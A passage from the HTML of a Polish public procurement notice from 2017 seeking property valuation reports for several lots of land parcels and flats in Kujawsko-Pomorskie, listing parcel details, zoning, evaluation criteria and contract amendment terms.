              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość ewentualnych zmian w umowie w zakresie przedłużenia terminu wykonania zamówienia, tylko i wyłącznie w przypadku:
1.   wystąpienia okoliczności siły wyższej np. zdarzenia losowego wywołanego przez czynniki zewnętrzne typu pożar, zalanie, powódź, warunki atmosferyczne itp., uniemożliwiających terminową realizację przedmiotowych zadań,
2.	z powodu działań osób trzecich, uniemożliwiających terminowe wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron np. przedłużające się procedury administracyjne. 
3.	zmiany treści umowy mogą nastąpić wyłącznie na pisemny wniosek WYKONAWCY, który uzyska pozytywną opinię Zamawiającego potwierdzającą jego zasadność. Wniosek powinien być złożony niezwłocznie po zaistnieniu warunków uniemożliwiających terminową realizację prac. Zamawiający zastrzega jednak, że maksymalny okres przesunięcia terminu zakończenia robót będzie równy okresowi przerwy. 
4.	pozostałe zmiany zawartej umowy, możliwe są wyłącznie gdy zachodzą okoliczności określone w art. 144 ustawy Prawo zamówień publicznych.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 23/02/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie nr 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 1
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1. Działka nr 47/12 powierzchnia 18,7149 ha obręb Krotoszyn gm. Barcin, powiat żniński, województwo kujawsko  pomorskie. Dla powyższej nieruchomości Sąd Rejonowy w Żninie, Wydział Ksiąg Wieczystych prowadzi księgę KW nr BY1U/00029668/4.
Charakterystyka nieruchomości: Nieruchomość nie rolna, przeznaczenie OG strefa lokalizacji urządzeń służących obsłudze zakładu górniczego tym dróg wewnętrznych, urządzeń energetycznych i łączności, bocznic kolejowych , strefie F  filary ochronne, strefie zz  strefy zwałowania nadkładu istniejące / planowane. Północno zachodnia część działki położona w granicach złoża wapieni i margli jurajskich BARCIN-PIECHCIN-PAKOŚĆ i piasków kwarcowych jako kopaliny towarzyszącej.
Zakres opracowania  1 operat w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 2
Przedmiotem wyceny są nieruchomości  położenie nieruchomości:
1. Działki nr 33/6, 56/6, 56/7 powierzchnia 16,9338 ha obręb Drążno, gmina Mrocza, powiat nakielski, województwo kujawsko  pomorskie. Dla przedmiotowej nieruchomości Sąd Rejonowy w Nakle, Wydział Ksiąg Wieczystych prowadzi księgi KW nr BY1N/00028111/2, BY1N/00005638/5.
Charakterystyka nieruchomości: Działki położone w gminie Drążno oznaczone numerami 33/6, 56/6 i 56/7 nie są objęte planem zagospodarowania przestrzennego, decyzją o ustaleniu warunków zabudowy, decyzją o ustaleniu lokalizacji inwestycji celu publicznego oraz nie są przedmiotem czynności mających na celu opracowanie i uchwalenie miejscowego planu zagospodarowania przestrzennego ( w tym farm wiatrowych).
W obowiązującym studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Mrocza ( Uchwała nr XX/180/2016 Rady Miejskiej w Mroczy z dnia 29 kwietnia 2016 r.  w sprawie studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Mrocza):
a.   działka nr 33/6 zlokalizowana jest na terenie oznaczonym jako: 
-   grunty rolne chronione klas bonitacyjnych II-III,
-   pozostałe tereny,
b.   działka nr 56/6 zlokalizowana jest na terenie oznaczonym jako:
-  pozostałe tereny,
c.   działka nr 56/7 zlokalizowana jest na terenie oznaczonym jako:
-   pozostałe tereny.
Zakres opracowania  1 operat w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 3
Przedmiotem wyceny są nieruchomości  położenie nieruchomości:
1. Przedmiotem wyceny są 4 lokale mieszkalne w budynku mieszkalnym wielorodzinnym wraz z przynależnościami i udziałem w gruncie w działce 102:
	-	lokal Nr 1 o powierzchni 45,00m 2 wraz z udziałem 45/420,
-	lokal Nr 3 o powierzchni 58,98 m 2 wraz z udziałem 59/420,
-	lokal Nr 6 o powierzchni 42,21 m 2 wraz z udziałem 42/420,
-	lokal Nr 7 o powierzchni 58,81 m 2 wraz z udziałem 59/420
Wskazany teren nie jest objęty miejscowym planem zagospodarowania przestrzennego gminy Gniewkowo. Zgodnie ze studium działka nr 102 obręb Kijewo znajduje się w strefie rolniczo-osadniczej, oznaczonej symbolem R-O, na terenie gruntów rolnych chronionych klas I-III.
Zakres opracowania  1 operat w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczen rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie nr 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 4
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1.	Działka nr 19/7 powierzchnia 0,1458 ha, obręb Dębieniec, gmina Radzyń Chełmiński powiat grudziądzki. 
Charakterystyka nieruchomości: Niezabudowana, nierolna, zadrzewiona, zakrzewiona, grunty orne, studium: strefa mieszkaniowa oznaczona symbolem MN.
2.	Działka nr 8/55  powierzchnia 0,1500 ha, obręb Dębieniec, gmina  Radzyń Chełmiński powiat grudziądzki. Charakterystyka nieruchomości: niezabudowana, rolna, zadrzewiona, zakrzewiona, rabaty bylinowe, grunty orne,   studium: strefa mieszkaniowa i figuruje jako MN-obszar zabudowy zagrodowej oraz mieszkaniowej jedno- i wielorodzinnej,                                                                                                                  
3.	Działka nr 37/2  powierzchnia 0,1300 ha, obręb Białobłoty, gmina  Świecie nad Osą powiat grudziądzki.  Charakterystyka nieruchomości niezabudowana, rolna, niezadrzewiona, grunty orne, były rów, w projekcie  studium: przeznaczona na cele rolne z możliwością lokalizacji elektrowni wiatrowych.                                                                                                             
4.	Działka nr 136/6  powierzchnia 0,1596 ha, obręb Dusocin, gmina Grudziądz, powiat grudziądzki. Charakterystyka nieruchomości: Zabudowana ( budynek inwentarski  5 chlewków), nierolna, niezadrzewiona, działka budowlana,   studium: istniejąca i projektowana zabudowa mieszkaniowo-usługowa 
5.	Działka nr 210/4, 210/5, 210/6 powierzchnia 0,4097 ha, obręb Zielnowo, gmina Radzyń Chełmiński powiat grudziądzki. Charakterystyka nieruchomości: Niezabudowana, rolna, zadrzewiona, zakrzewiona, plan: 7RM- tereny zabudowy zagrodowej.
6.	Działka nr 16/14  powierzchnia 0,0800 ha, obręb Piaski, gmina  Grudziądz powiat grudziądzki. Charakterystyka nieruchomości: niezabudowana, rolna, niezadrzewiona, część zakrzewiona, rów, w  studium: istniejąca i projektowana zabudowa mieszkaniowo usługowa. 
7.	Działka nr 171/13  powierzchnia 0,0900 ha, obręb Mokre, gmina  Grudziądz powiat grudziądzki. Charakterystyka nieruchomości: niezabudowana, rolna, zadrzewiona, zakrzewiona, w  studium: istniejąca i projektowana zabudowa mieszkaniowo usługowa. 
8.	Działka nr 96/1  powierzchnia 0,1100 ha, obręb Szynych, gmina  Grudziądz powiat grudziądzki. Charakterystyka nieruchomości: niezabudowana, rolna, zadrzewiona, zakrzewiona, użytek zielony, w studium: istniejąca i projektowana zabudowa mieszkaniowo-usługowa. 
9.	Działka nr 114/2  powierzchnia 0,5496 ha, obręb Mełno, gmina  Gruta powiat grudziądzki. Charakterystyka nieruchomości: niezabudowana, rolna, zadrzewiona, zakrzewiona, grunty orne, użytki zielone, położona w bezpośrednim sąsiedztwie jeziora, w  studium:  użytkowanie rolnicze.
10.	Działka nr 114/3  powierzchnia 0,8504 ha, obręb Mełno, gmina  Gruta powiat grudziądzki. Charakterystyka nieruchomości: niezabudowana, rolna, zadrzewiona, zakrzewiona, grunty orne, użytki zielone, położona w bezpośrednim sąsiedztwie jeziora, posadowiona studnia, w studium:  użytkowanie rolnicze.
Zakres opracowania  10 operatów w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zadanie nr 5<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 5
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1.	Działka nr 19 powierzchnia 0,2864 ha, obręb Zgoda, gmina Aleksandrów Kujawski , powiat aleksandrowski. Charakterystyka nieruchomości: Rolna, niezabudowana, część zadrzewiona, nieużytek, wyrobisko po żwirowni, studium: rolnicza przestrzeń produkcyjna.                                                   
2.	Działka nr 65/3 powierzchnia 0,4458 ha, obręb Zgoda, gmina Aleksandrów Kujawski , powiat aleksandrowski. Charakterystyka nieruchomości: Rolna, niezabudowana, zadrzewiona, nie ma dostępu do drogi publicznej, studium: rolnicza przestrzeń produkcyjna. 
3.	Działka nr 34/5 powierzchnia 0,2217 ha, obręb Zgoda, gmina Aleksandrów Kujawski , powiat aleksandrowski. Charakterystyka nieruchomości: Rolna, niezabudowana, użytek zielony, część zadrzewiona, położona na skarpie, studium: rolnicza przestrzeń produkcyjna. 
4.	Działka nr 34/2 powierzchnia 0,2217 ha, obręb Zgoda, gmina Aleksandrów Kujawski , powiat aleksandrowski. Charakterystyka nieruchomości: Rolna, odłogowana, niezadrzewiona, niezabudowana, teren płaski studium: rolnicza przestrzeń produkcyjna. 
5.	Działka nr 70/1 powierzchnia 0,1036 ha, obręb Zgoda, gmina Aleksandrów Kujawski , powiat aleksandrowski. Charakterystyka nieruchomości: Rolna, niezabudowana, zadrzewiona, nie ma dostępu do drogi publicznej, studium: rolnicza przestrzeń produkcyjna. 
6.	udział 6/8 w nieruchomości działka(i) nr 20 i 35/2 powierzchnia 1,0587ha, obręb Zgoda, gmina Aleksandrów Kujawski , powiat aleksandrowski. Charakterystyka nieruchomości: Działka nr 20 - rolna, niezabudowana, część zadrzewiona, nieużytek, wyrobisko po żwirowni. Działka nr 35/2 rolna, niezabudowana, niezadrzewiona, część stanowi wyrobisko po żwirowni, część położona na skarpie, studium: rolnicza przestrzeń produkcyjna. 
7.	Działka nr 455/6  powierzchnia 0,0051 ha, obręb Służewo, gmina Aleksandrów Kujawski, powiat aleksandrowski. Charakterystyka nieruchomości: Zabudowana częścią budynku zlewni mleka stanowiącym odrębną własność, nierolna, niezadrzewiona, studium: teren dla funkcji usługowych lokalnych, oznaczonych symbolem U, w strefie ochrony zespołów ruralistycznych.
Zakres opracowania 7 operatów w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zadanie nr 6<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 6
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1.	Działka nr 14/1 powierzchnia 0,4000 ha, obręb Zosin, gmina Zbójno, powiat golubski.
Charakterystyka nieruchomości: Działka w studium uwarunkowań jest z przeznaczeniem jako teren rolniczy. 
Zakres opracowania  1 operat w dwóch wykonaniach.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Zadanie r 7<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 7
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1. Działka nr 632/23 powierzchnia 0,4516 ha, obręb Żołędowo, gmina Osielsko, powiat bydgoski. Charakterystyka nieruchomości: Niezabudowana, nierolna, zakrzaczona. Plan: tereny usług, przemysłu i składów.
2. Działka nr 632/24  powierzchnia 0,5768 ha, obręb Żołędowo, gmina  Osielsko, powiat bydgoski. Charakterystyka nieruchomości: Niezabudowana, nierolna, zakrzaczona. Plan: tereny usług, przemysłu i składów.
3. Działka nr 632/25  powierzchnia 0,4525 ha, obręb Żołędowo, gmina  Osielsko, powiat bydgoski. Charakterystyka nieruchomości: Niezabudowana, nierolna, zakrzaczona. Plan: tereny usług, przemysłu i składów.
 4. Działka nr 632/26  powierzchnia 0,5791 ha, obręb Żołędowo, gmina Osielsko, powiat bydgoski. Charakterystyka nieruchomości: Niezabudowana, nierolna, zakrzaczona. Plan: tereny usług, przemysłu i składów.
Zakres opracowania  4 operaty w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Zadanie nr 8<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 8
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1. Działka nr 57/1 i 57/2 o łącznej powierzchni  0,4831 ha, obręb Góra, gmina i  powiat  Inowrocław. Charakterystyka nieruchomości działki po kolejce wąskotorowej niezabudowane  na   dla powyższej nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działki znajdują się granicach terenu górniczego kopalni soli. 
2. Działka nr 46/6 o łącznej powierzchni  0,1060 ha, obręb Trzaski, gmina i  powiat  Inowrocław.
Charakterystyka nieruchomości: działka rolna   niezabudowana, stanowi pas ziemi po kolejce wąskotorowej dla powyższej nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w obszarze stanowiącym grunty pochodzenia organicznego. 
3. Działka nr 46/7 o łącznej powierzchni  0,0560 ha, obręb Trzaski, gmina i  powiat  Inowrocław.                                       
Charakterystyka nieruchomości: działka rolna   niezabudowana, stanowi pas ziemi po kolejce wąskotorowej  dla powyższej nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w obszarze stanowiącym grunty pochodzenia organicznego.
4. Działka nr 46/8 o łącznej powierzchni  0,1753 ha, obręb Trzaski, gmina i  powiat  Inowrocław.
Charakterystyka nieruchomości: działka rolna niezabudowana, stanowi pas ziemi po kolejce wąskotorowej dla powyższej nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w obszarze stanowiącym grunty pochodzenia organicznego.
5. Działka nr 169/7 o łącznej powierzchni 0,4164 ha, obręb Batkowo, gmina i  powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna   niezabudowana, po siedlisku  dla powyższej nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie umiarkowanej intensywności zabudowy. Część działki znajduje się w strefie ,,W ochrony archeologicznej.
6. Działka nr 41/4 o łącznej powierzchni  0,0546 ha, obręb Balice, gmina Janikowo   powiat  Inowrocław. Charakterystyka nieruchomości: działka po kolejce wąskotorowej   niezabudowana  dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie R 2  obszar produkcji rolniczej.
7. Działka nr 41/5 o łącznej powierzchni  0,0509 ha, obręb Balice, gmina Janikowo   powiat  Inowrocław. Charakterystyka nieruchomości: działka po kolejce wąskotorowej   niezabudowana  dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie R 2  obszar produkcji rolniczej.
8. Działka nr 41/6 o łącznej powierzchni  0,0232 ha, obręb Balice, gmina Janikowo   powiat  Inowrocław. Charakterystyka nieruchomości: działka po kolejce wąskotorowej   niezabudowana  dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie R 2  obszar produkcji rolniczej.
9. Działka nr 64/3 o łącznej powierzchni  0,4087 ha, obręb Wierzchosławice, gmina Gniewkowo   powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna niezabudowana  dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w jednostce rolniczo- osadniczej na terenach zabudowanych o symbolu R-O  są to tereny istniejącej zabudowy miejscowości oraz tereny rozwoju przestrzennego istniejących miejscowości. 
10. Działka nr 40/3 o łącznej powierzchni  0,0513 ha, obręb Bródzki, gmina Kruszwica   powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna niezabudowana po kolejce wąskotorowej dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie wiejskiej B- rolniczo- leśnej przestrzeni produkcyjnej  z osadnictwem skoncentrowanym z umiarkowanym rozwojem funkcji produkcyjnych i usługowych, są to tereny rolnicze.
11. Działka nr 68/1 o łącznej powierzchni  0,2058 ha, obręb Wola Wapowska, gmina Kruszwica   powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna niezabudowana dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie wiejskiej B- rolniczo- leśnej przestrzeni produkcyjnej z osadnictwem skoncentrowanym z umiarkowanym rozwojem funkcji produkcyjnych i usługowych. Jest to ciek wodny. Położona jest w obszarach wskazanych pod lokalizację elektrowni wiatrowych lecz nie przewiduje się na niej posadowienia elektrowni wiatrowych
12. Działka nr 185/1 o łącznej powierzchni  0,0721 ha, obręb Skotniki, gmina Kruszwica powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna niezabudowana dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie wiejskiej B- rolniczo- leśnej przestrzeni produkcyjnej  z osadnictwem skoncentrowanym z umiarkowanym rozwojem funkcji produkcyjnych i usługowych.  
13. Działka nr 185/2 o łącznej powierzchni  0,0933 ha, obręb Skotniki, gmina Kruszwica   powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna niezabudowana dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie wiejskiej B- rolniczo- leśnej przestrzeni produkcyjnej  z osadnictwem skoncentrowanym z umiarkowanym rozwojem funkcji produkcyjnych i usługowych.   Działka nie posiada dostępu do drogi publicznej.
14. Działka nr 185/3 o łącznej powierzchni  0,1412 ha, obręb Skotniki, gmina Kruszwica   powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna niezabudowana dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie wiejskiej B- rolniczo- leśnej przestrzeni produkcyjnej  z osadnictwem skoncentrowanym z umiarkowanym rozwojem funkcji produkcyjnych i usługowych.   Działka nie posiada dostępu do drogi publicznej.
